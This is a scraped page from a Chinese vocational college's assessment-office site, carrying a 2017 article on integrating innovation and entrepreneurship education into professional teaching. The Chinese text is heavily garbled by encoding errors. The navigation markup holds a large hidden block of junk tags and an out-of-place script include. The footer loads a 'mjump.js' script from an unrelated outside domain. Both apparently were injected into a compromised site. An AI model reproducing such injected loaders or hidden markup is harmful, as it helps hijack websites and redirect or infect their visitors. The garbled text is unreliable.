ï»cu 创新创业教育与专业教育如何融合发å±Õl郑州城市职业学院-评估办公定ó/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><td id='7zxoh'></td><small id='7zxoh'></small><dd id='7zxoh'><dl id='7zxoh'></dl><big id='7zxoh'></big></dd><font id='7zxoh'></font><strike id='7zxoh'></strike><table id='7zxoh'></table><strong id='7zxoh'><ol id='7zxoh'></ol></strong><tr id='7zxoh'><table id='7zxoh'><strike id='7zxoh'></strike><form id='7zxoh'></form><tbody id='7zxoh'></tbody></table><dl id='7zxoh'><sub id='7zxoh'></sub><tfoot id='7zxoh'><tbody id='7zxoh'><address id='7zxoh'><blockquote id='7zxoh'></blockquote></address></tbody></tfoot></dl></tr><address id='7zxoh'></address><dd id='7zxoh'></dd><dd id='7zxoh'><span id='7zxoh'></span></dd><label id='7zxoh'><center id='7zxoh'><dl id='7zxoh'><p id='7zxoh'></p></dl><label id='7zxoh'><b id='7zxoh'></b></label></center></label><small id='7zxoh'></small><abbr id='7zxoh'></abbr><ins id='7zxoh'><q id='7zxoh'></q><fieldset id='7zxoh'><thead id='7zxoh'><div id='7zxoh'><q id='7zxoh'></q></div></thead></fieldset></ins><u id='7zxoh'></u><code id='7zxoh'></code><table id='7zxoh'><dt id='7zxoh'></dt></table><tt id='7zxoh'></tt><center id='7zxoh'></center><strike id='7zxoh'><u id='7zxoh'></u></strike><dir id='7zxoh'><b id='7zxoh'></b><dfn id='7zxoh'></dfn><dd id='7zxoh'></dd><tfoot id='7zxoh'></tfoot></dir><big id='7zxoh'></big><tfoot id='7zxoh'></tfoot><sub id='7zxoh'></sub><noframes id='7zxoh'></noframes><strong id='7zxoh'><q id='7zxoh'><th id='7zxoh'></th><dt id='7zxoh'></dt></q></strong><fieldset id='7zxoh'><b id='7zxoh'></b><fieldset id='7zxoh'><dd id='7zxoh'></dd></fieldset></fieldset><table id='7zxoh'></table><small id='7zxoh'><button id='7zxoh'><li id='7zxoh'></li></button></small><table id='7zxoh'><optgroup id='7zxoh'></optgroup><th id='7zxoh'></th></table><ul id='7zxoh'></ul><select id='7zxoh'></select><tbody id='7zxoh'></tbody><label id='7zxoh'></label><select id='7zxoh'><dd id='7zxoh'><p id='7zxoh'></p></dd></select><center id='7zxoh'><th id='7zxoh'></th></center><dir id='7zxoh'></dir><table id='7zxoh'></table><label id='7zxoh'></label><bdo id='7zxoh'><tt id='7zxoh'><kbd id='7zxoh'></kbd></tt></bdo><b id='7zxoh'><style id='7zxoh'><option id='7zxoh'><kbd id='7zxoh'><dd id='7zxoh'><dd id='7zxoh'></dd></dd></kbd></option><blockquote id='7zxoh'></blockquote></style></b><dt id='7zxoh'><button id='7zxoh'></button></dt><dfn id='7zxoh'></dfn><small id='7zxoh'></small><label id='7zxoh'><del id='7zxoh'><dd id='7zxoh'><code id='7zxoh'></code><acronym id='7zxoh'><center id='7zxoh'></center><tbody id='7zxoh'><thead id='7zxoh'><ins id='7zxoh'></ins></thead></tbody><ins id='7zxoh'><em id='7zxoh'><button id='7zxoh'></button></em></ins></acronym></dd></del></label><option id='7zxoh'></option><u id='7zxoh'></u><strong id='7zxoh'></strong><strike id='7zxoh'><fieldset id='7zxoh'><small id='7zxoh'><thead id='7zxoh'></thead></small></fieldset></strike><label id='7zxoh'><u id='7zxoh'></u><del id='7zxoh'></del></label><sub id='7zxoh'></sub><strike id='7zxoh'></strike><tbody id='7zxoh'><small id='7zxoh'></small><pre id='7zxoh'></pre></tbody><u id='7zxoh'></u><table id='7zxoh'></table><p id='7zxoh'></p><td id='7zxoh'></td><code id='7zxoh'></code><del id='7zxoh'><style id='7zxoh'><option id='7zxoh'><fieldset id='7zxoh'></fieldset><tt id='7zxoh'></tt></option></style></del><legend id='7zxoh'><kbd id='7zxoh'><acronym id='7zxoh'><bdo id='7zxoh'><strike id='7zxoh'><span id='7zxoh'></span></strike></bdo></acronym></kbd></legend><del id='7zxoh'></del><option id='7zxoh'><ins id='7zxoh'></ins></option><table id='7zxoh'><span id='7zxoh'></span><sub id='7zxoh'><tt id='7zxoh'></tt></sub></table><small id='7zxoh'><ol id='7zxoh'><strong id='7zxoh'><kbd id='7zxoh'><code id='7zxoh'><option id='7zxoh'></option><u id='7zxoh'><center id='7zxoh'></center></u></code></kbd></strong><li id='7zxoh'><i id='7zxoh'></i></li></ol></small><noframes id='7zxoh'><dir id='7zxoh'><del id='7zxoh'><del id='7zxoh'></del><pre id='7zxoh'><pre id='7zxoh'><option id='7zxoh'><address id='7zxoh'></address><bdo id='7zxoh'><tr id='7zxoh'><acronym id='7zxoh'><pre id='7zxoh'></pre></acronym><div id='7zxoh'></div></tr></bdo></option></pre><small id='7zxoh'><address id='7zxoh'><u id='7zxoh'><legend id='7zxoh'><option id='7zxoh'><abbr id='7zxoh'></abbr><li id='7zxoh'><pre id='7zxoh'></pre></li></option></legend><select id='7zxoh'></select></u></address></small></pre></del><sup id='7zxoh'></sup><blockquote id='7zxoh'><dt id='7zxoh'></dt></blockquote><blockquote id='7zxoh'></blockquote></dir><tt id='7zxoh'></tt><u id='7zxoh'><tt id='7zxoh'><form id='7zxoh'></form></tt><td id='7zxoh'><dt id='7zxoh'></dt></td></u></noframes><optgroup id='7zxoh'><tfoot id='7zxoh'></tfoot></optgroup><pre id='7zxoh'><tfoot id='7zxoh'><address id='7zxoh'></address><blockquote id='7zxoh'></blockquote></tfoot></pre><strong id='7zxoh'><option id='7zxoh'><option id='7zxoh'><style id='7zxoh'></style></option></option></strong><tr id='7zxoh'></tr><form id='7zxoh'></form><form id='7zxoh'><form id='7zxoh'></form><ol id='7zxoh'><sup id='7zxoh'></sup></ol></form><th id='7zxoh'></th><td id='7zxoh'></td><code id='7zxoh'><li id='7zxoh'><dl id='7zxoh'><button id='7zxoh'><sub id='7zxoh'><span id='7zxoh'><ins id='7zxoh'></ins></span></sub></button><li id='7zxoh'><li id='7zxoh'><form id='7zxoh'></form><blockquote id='7zxoh'></blockquote></li><code id='7zxoh'></code><dir id='7zxoh'><noframes id='7zxoh'></noframes></dir><kbd id='7zxoh'></kbd><dir id='7zxoh'></dir></li><td id='7zxoh'><tfoot id='7zxoh'></tfoot></td></dl></li></code><tbody id='7zxoh'><small id='7zxoh'></small><kbd id='7zxoh'><select id='7zxoh'><tt id='7zxoh'><p id='7zxoh'></p><address id='7zxoh'></address></tt></select></kbd></tbody><pre id='7zxoh'></pre><tr id='7zxoh'></tr><noframes id='7zxoh'><code id='7zxoh'><i id='7zxoh'><q id='7zxoh'><legend id='7zxoh'><pre id='7zxoh'><style id='7zxoh'><acronym id='7zxoh'><i id='7zxoh'><form id='7zxoh'><option id='7zxoh'><center id='7zxoh'></center></option></form></i></acronym></style><tt id='7zxoh'></tt></pre></legend></q></i></code><center id='7zxoh'></center></noframes><thead id='7zxoh'><sub id='7zxoh'></sub></thead><sup id='7zxoh'><div id='7zxoh'></div></sup><td id='7zxoh'><dd id='7zxoh'><fieldset id='7zxoh'><code id='7zxoh'><blockquote id='7zxoh'><tfoot id='7zxoh'></tfoot></blockquote></code><td id='7zxoh'></td></fieldset></dd><tr id='7zxoh'><label id='7zxoh'><dir id='7zxoh'></dir></label></tr></td><style id='7zxoh'></style><option id='7zxoh'></option><legend id='7zxoh'><fieldset id='7zxoh'><u id='7zxoh'></u></fieldset><strike id='7zxoh'><td id='7zxoh'></td><tfoot id='7zxoh'></tfoot><u id='7zxoh'><tr id='7zxoh'></tr></u></strike></legend><fieldset id='7zxoh'><dir id='7zxoh'><form id='7zxoh'><optgroup id='7zxoh'></optgroup></form></dir><font id='7zxoh'><dl id='7zxoh'></dl></font></fieldset><blockquote id='7zxoh'></blockquote><style id='7zxoh'></style><p id='7zxoh'></p><label id='7zxoh'><ol id='7zxoh'><sub id='7zxoh'><noscript id='7zxoh'><code id='7zxoh'></code></noscript><td id='7zxoh'><tr id='7zxoh'><b id='7zxoh'><dl id='7zxoh'><ol id='7zxoh'></ol></dl></b></tr></td><dt id='7zxoh'></dt></sub></ol><address id='7zxoh'></address></label><legend id='7zxoh'><pre id='7zxoh'><style id='7zxoh'><acronym id='7zxoh'></acronym><ul id='7zxoh'><u id='7zxoh'></u><table id='7zxoh'><acronym id='7zxoh'><tt id='7zxoh'><blockquote id='7zxoh'></blockquote></tt></acronym><big id='7zxoh'></big></table><noframes id='7zxoh'><font id='7zxoh'></font></noframes></ul></style></pre></legend><p id='7zxoh'></p><dfn id='7zxoh'><blockquote id='7zxoh'></blockquote><u id='7zxoh'><ol id='7zxoh'><bdo id='7zxoh'></bdo></ol></u></dfn><acronym id='7zxoh'><noscript id='7zxoh'></noscript></acronym><i id='7zxoh'></i><button id='7zxoh'><ol id='7zxoh'></ol><legend id='7zxoh'></legend></button><label id='7zxoh'></label><ol id='7zxoh'></ol><address id='7zxoh'><legend id='7zxoh'><u id='7zxoh'><font id='7zxoh'><tt id='7zxoh'></tt><strong id='7zxoh'><span id='7zxoh'><q id='7zxoh'></q></span></strong></font></u><u id='7zxoh'></u></legend></address><ins id='7zxoh'></ins><q id='7zxoh'><address id='7zxoh'><option id='7zxoh'></option></address></q><p id='7zxoh'></p><dd id='7zxoh'></dd><td id='7zxoh'><style id='7zxoh'></style></td><em id='7zxoh'><optgroup id='7zxoh'></optgroup><address id='7zxoh'><tfoot id='7zxoh'><address id='7zxoh'></address></tfoot></address></em><p id='7zxoh'><table id='7zxoh'><option id='7zxoh'></option><tt id='7zxoh'></tt></table></p><ins id='7zxoh'><style id='7zxoh'><tbody id='7zxoh'><span id='7zxoh'><thead id='7zxoh'></thead></span><li id='7zxoh'><button id='7zxoh'></button></li><del id='7zxoh'><div id='7zxoh'><small id='7zxoh'></small></div><i id='7zxoh'></i></del></tbody></style><noscript id='7zxoh'><thead id='7zxoh'><tr id='7zxoh'></tr></thead></noscript></ins><p id='7zxoh'><dd id='7zxoh'><button id='7zxoh'></button><del id='7zxoh'><label id='7zxoh'><b id='7zxoh'></b><li id='7zxoh'></li></label><big id='7zxoh'></big></del><pre id='7zxoh'><tbody id='7zxoh'><style id='7zxoh'><dt id='7zxoh'></dt></style><legend id='7zxoh'><noframes id='7zxoh'><dd id='7zxoh'></dd></noframes></legend></tbody><button id='7zxoh'></button></pre><li id='7zxoh'><span id='7zxoh'></span></li></dd></p><li id='7zxoh'></li><fieldset id='7zxoh'><ol id='7zxoh'></ol></fieldset><kbd id='7zxoh'></kbd><small id='7zxoh'><b id='7zxoh'><optgroup id='7zxoh'></optgroup><div id='7zxoh'></div></b><div id='7zxoh'></div></small><u id='7zxoh'></u><big id='7zxoh'><ul id='7zxoh'></ul></big><button id='7zxoh'><sup id='7zxoh'><ol id='7zxoh'></ol><strong id='7zxoh'></strong></sup></button><option id='7zxoh'></option><tr id='7zxoh'></tr><b id='7zxoh'><div id='7zxoh'></div></b><tbody id='7zxoh'><acronym id='7zxoh'><acronym id='7zxoh'></acronym></acronym><dfn id='7zxoh'></dfn></tbody><ol id='7zxoh'><kbd id='7zxoh'></kbd></ol><kbd id='7zxoh'><em id='7zxoh'><dir id='7zxoh'><thead id='7zxoh'></thead></dir></em></kbd><table id='7zxoh'></table><select id='7zxoh'></select><table id='7zxoh'></table><sup id='7zxoh'></sup><bdo id='7zxoh'></bdo><noscript id='7zxoh'><dfn id='7zxoh'><fieldset id='7zxoh'><button id='7zxoh'></button></fieldset></dfn></noscript><thead id='7zxoh'></thead><table id='7zxoh'></table><font id='7zxoh'></font><button id='7zxoh'></button><legend id='7zxoh'><p id='7zxoh'><select id='7zxoh'></select><abbr id='7zxoh'></abbr></p></legend><del id='7zxoh'><del id='7zxoh'></del></del><dt id='7zxoh'></dt><blockquote id='7zxoh'></blockquote><strike id='7zxoh'></strike><button id='7zxoh'></button><u id='7zxoh'></u><legend id='7zxoh'><del id='7zxoh'><i id='7zxoh'></i></del></legend><noframes id='7zxoh'></noframes><tbody id='7zxoh'></tbody><dir id='7zxoh'><dir id='7zxoh'><select id='7zxoh'></select></dir></dir><font id='7zxoh'></font><u id='7zxoh'></u><bdo id='7zxoh'><optgroup id='7zxoh'></optgroup></bdo><sub id='7zxoh'></sub><tr id='7zxoh'><font id='7zxoh'><tbody id='7zxoh'><dfn id='7zxoh'></dfn></tbody></font></tr><font id='7zxoh'></font><table id='7zxoh'><blockquote id='7zxoh'><em id='7zxoh'><dl id='7zxoh'><acronym id='7zxoh'><code id='7zxoh'><thead id='7zxoh'></thead><bdo id='7zxoh'><option id='7zxoh'></option></bdo></code></acronym></dl></em></blockquote></table><button id='7zxoh'></button><legend id='7zxoh'><tt id='7zxoh'></tt><li id='7zxoh'></li></legend><pre id='7zxoh'></pre><center id='7zxoh'><label id='7zxoh'><dl id='7zxoh'><td id='7zxoh'></td></dl></label><abbr id='7zxoh'></abbr></center><del id='7zxoh'><noscript id='7zxoh'></noscript><thead id='7zxoh'></thead></del><ol id='7zxoh'><noscript id='7zxoh'><tbody id='7zxoh'><acronym id='7zxoh'></acronym></tbody></noscript><b id='7zxoh'></b><dt id='7zxoh'></dt><option id='7zxoh'></option></ol><strong id='7zxoh'><button id='7zxoh'></button></strong><sub id='7zxoh'></sub><del id='7zxoh'><strong id='7zxoh'><td id='7zxoh'></td></strong><p id='7zxoh'><button id='7zxoh'><ul id='7zxoh'><dfn id='7zxoh'></dfn><label id='7zxoh'></label></ul></button></p></del><acronym id='7zxoh'><form id='7zxoh'><noframes id='7zxoh'></noframes></form><th id='7zxoh'><u id='7zxoh'><small id='7zxoh'><span id='7zxoh'></span></small></u><tr id='7zxoh'><abbr id='7zxoh'><strike id='7zxoh'></strike></abbr></tr></th></acronym><strike id='7zxoh'><button id='7zxoh'><td id='7zxoh'><select id='7zxoh'><li id='7zxoh'><sub id='7zxoh'><style id='7zxoh'></style><tfoot id='7zxoh'></tfoot></sub></li></select></td></button></strike><label id='7zxoh'></label><span id='7zxoh'><u id='7zxoh'></u></span><style id='7zxoh'><bdo id='7zxoh'><noscript id='7zxoh'><b id='7zxoh'></b></noscript><thead id='7zxoh'><dt id='7zxoh'><form id='7zxoh'></form></dt></thead></bdo><button id='7zxoh'><form id='7zxoh'><del id='7zxoh'></del></form><q id='7zxoh'><address id='7zxoh'><ol id='7zxoh'><acronym id='7zxoh'><label id='7zxoh'><span id='7zxoh'><li id='7zxoh'></li><font id='7zxoh'><span id='7zxoh'></span></font><b id='7zxoh'></b></span></label><button id='7zxoh'></button><big id='7zxoh'></big><form id='7zxoh'><div id='7zxoh'><dir id='7zxoh'><strong id='7zxoh'><label id='7zxoh'></label></strong></dir></div></form><dt id='7zxoh'></dt><tt id='7zxoh'></tt></acronym><li id='7zxoh'><li id='7zxoh'><dt id='7zxoh'><acronym id='7zxoh'></acronym></dt></li></li></ol></address><sub id='7zxoh'></sub></q></button><table id='7zxoh'></table></style><td id='7zxoh'><dd id='7zxoh'></dd></td><label id='7zxoh'></label><button id='7zxoh'><td id='7zxoh'></td></button><table id='7zxoh'><select id='7zxoh'><label id='7zxoh'><tr id='7zxoh'></tr><noframes id='7zxoh'></noframes><select id='7zxoh'><small id='7zxoh'></small></select></label></select></table><span id='7zxoh'></span><label id='7zxoh'></label><tfoot id='7zxoh'></tfoot><abbr id='7zxoh'></abbr><option id='7zxoh'><button id='7zxoh'><tbody id='7zxoh'><strike id='7zxoh'><select id='7zxoh'></select></strike></tbody></button></option><abbr id='7zxoh'><option id='7zxoh'></option><u id='7zxoh'><b id='7zxoh'></b></u></abbr><font id='7zxoh'></font><form id='7zxoh'></form><ins id='7zxoh'><noframes id='7zxoh'></noframes><pre id='7zxoh'><u id='7zxoh'><i id='7zxoh'><em id='7zxoh'><option id='7zxoh'></option></em></i></u><ol id='7zxoh'><kbd id='7zxoh'><span id='7zxoh'></span><abbr id='7zxoh'><i id='7zxoh'><ins id='7zxoh'></ins></i></abbr></kbd></ol></pre></ins><optgroup id='7zxoh'></optgroup><noframes id='7zxoh'><style id='7zxoh'></style><sub id='7zxoh'><dfn id='7zxoh'><abbr id='7zxoh'><big id='7zxoh'><bdo id='7zxoh'></bdo></big></abbr></dfn></sub></noframes><strike id='7zxoh'></strike><td id='7zxoh'></td><sub id='7zxoh'><center id='7zxoh'></center><abbr id='7zxoh'></abbr><noframes id='7zxoh'><dir id='7zxoh'></dir></noframes></sub><tfoot id='7zxoh'></tfoot><style id='7zxoh'></style><legend id='7zxoh'><tfoot id='7zxoh'><b id='7zxoh'></b><q id='7zxoh'><del id='7zxoh'><style id='7zxoh'><address id='7zxoh'></address></style><kbd id='7zxoh'><li id='7zxoh'></li><small id='7zxoh'></small></kbd></del></q><small id='7zxoh'><strike id='7zxoh'></strike></small></tfoot><dd id='7zxoh'><tt id='7zxoh'><strong id='7zxoh'><big id='7zxoh'></big></strong></tt></dd></legend><form id='7zxoh'></form><style id='7zxoh'></style></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动急ú/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘äÒ/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠÉL/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置ï¼?a href="/pgw/">首页</a> > 高职研究 > 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公定ó/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动急ú/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘äÒ/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠÉL/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>高职研究</h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>创新创业教育与专业教育如何融合发å±ýó/h1> <div class="info">发布时间ï¼?017å¹­å5朞¹8日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=1845"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-autospace: ideograph-numeric"> </p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    在当å‰?ldquo;大众创业、万众创方prdquo;的大背景下,高校创新创业教育越来越受到重视。高职院校作为实施创新创业教育的主力军,需要进一步更新理念,结合职业教育人才培养的特点,着力发挥校企合作的优势,在学生掌握基本专业技能的同时进行创新创业意识的培养和能力的拓展,以适应“大众创业、万众创方prdquo;环境下的就业竞争ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    åˆ›æ–°åˆ›ä¸šæ•™è‚²å‘传统的专业教育渗透需要有一个探索和积淀的过程,高职院校需要对创新创业教育与专业教育进行系统设计,遵循针对性、发散性、适用性原则,通过理念与课程融合、师资与项目融合、实践与体验融合、平台与资源融合、引导与制度融合、形态与文化融合等推进人才培养模式改革ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    ç†å¿µä¸Žè¯¾ç¨‹èžåˆã€‚将创新创业教育融入专业教育的理念贯穿到课程设计的全过程。结合专业群特点,突出课稥uldquo;意识培养+知识普及+体验实践”的教学功能,分门别类地设置创新创业教育相关的必修课与选修课,将创新创业的基本理论知识和创新创业实践中所需要的法律、营销、电子商务、企业管理等相关内容,作为必修通用知识编入创新创业通识课程教材。根据不同专业群,从创新创业知识与专业知识互补的角度出发,搭配适当的选修课建议组合供学生选择,也可根据专业相关性直接提供一定量的选修内容由学生自由搭配,不断开发适合不同学生群体的课程内容与实践案例ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    å¸ˆèµ„与项目融合。积极拓展校内的活动、项目载体,分兴趣、分类型、分方向构建学生的实践项目体系。以社团活动为项目载体,分专业类、兴趣类、实战类等组建创新创业型社团,每个社团相对固定一名有相关专业背景的指导教师,引导学生能力激发、兴趣激发、创意激发;以科技创新活动或竞赛为项目载体,每个项目对接一名或若干名指导教师,跨专业组建师生共同参与的项目团队,可采用教师指导、学生合作开发的模式,教师带动学生深入真实项目研究;组建甡×ldquo;专业导师+企业导师+创业导师”组成的结构合理、相对稳定的指导师资团队,选拔在各类活动、项目中表现突出,有一定潜质的学生进行强化训练,提高学生创新创业教育与专业指导的灵活性和针对性ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    å®žè·µä¸Žä½“验融合。在实践中加强学生的角色体验、过程体验和环境体验。将社会调研、专业领域信息数据整理、行业发展分析、案例剖析等纳入课程学习内容,使学生定位于社会职业人的身份,在实践活动中梳理出体现专业背景、符合市场需求、适合自身发展实际的专业拓展方向和创新创业方向;引导学生走出课堂、走进实训室、走入企业,将实践教学与产品研发、课题研究等工作相结合,以提升技术技能水平,夯实学生创新创业发展的基础;辅助学生依托专业社会服务平台、专业技能与创新创业竞赛、创业孵化等平台走出校园、走向社会,加强专业实践与创新创业的综合体验,形æˆldquo;专业技能n科技创新+社会服务+素质拓展”的综合体验链ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    å¹³å°ä¸Žèµ„源融合。构建有利于创新创业教育融入专业教育的平台,并进行合理的资源配置。充分整合校内资源,针对创新创业教育与专业教育有效结合的需要进行机构改革,成立创新创业教育与专业教育融合发展的协调机构;以专业群资源共享的方式建设校内外实训基地,使实训基地进一步发挥优势,在专业教育的基础上进一步丰富和拓展其创新创业教育功能;借助地方办学或行业办学的优势,充分发挥地方政府或行业企业的资源,争取地方政府或行业支持学生创新创业的政策支持,引导鼓励校内师生团队融入地方特色产业和创意产业发展,促进行业新产品、新技术的开发,助推地方和行业的创新创业ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    å¼•å¯¼ä¸Žåˆ¶åº¦èžåˆã€‚跳出专业层面,顶层设计人才培养过程中创新创业通用能力的培养载体,配套制度引导创新创业教育与专业教育的相互渗透。如在学生的学业管理和学分取得上,可采用学分积累或转换的方式,对学生在科技竞赛、创新创业实践等方面取得的优秀成果进行学分认定和转换,使学生的创新创业成果学分可累加替换为通识选修课、专业课、第二课堂等课程学分,激发学生在专业学习中参与创新创业活动的积极性ã€ÙG/span></span></p> <p align="justify" style="text-justify: inter-ideograph; text-align: justify; line-height: 300%; text-indent: 0pt; text-autospace: ideograph-numeric"><span style="font-size: 16px"><span>    å½¢æ€ä¸Žæ–‡åŒ–融合。将组织形态、教学形态、制度形态、空间布局形态等与创新创业教育文化融入人才培养全过程。在学习、生活和实践场所宣传励志成才的典型案例,营é€ldquo;大众创业、万众创方prdquo;的氛围;在校企合作单位与学生实践实习场所,将企业文化融于学生的学习过程,使创新创业的企业发展理念深入人心;将流程规范、管理制度、激励制度等制度的学习,作为新生入学的第一课,引导学生养成良好的学习习惯和精神状态,在专业学习和创新创业活动中形成一种自觉规范;立足校情,结合专业特点,以届制性和延续性的活动为载体,塑造适合本校的创新创业文化生态,彰显文化软环境在人才培养中的作用。(作者凌镜,系金华职业技术学院副研究员)</span></span></p> <p> </p> <p> </p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编ï¼?52370 电话ï¼?371-69213333 <br> 豫ICP夣S2014925另R </div> <script type="text/javascript" src="https://js.users.51.la/19550489.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>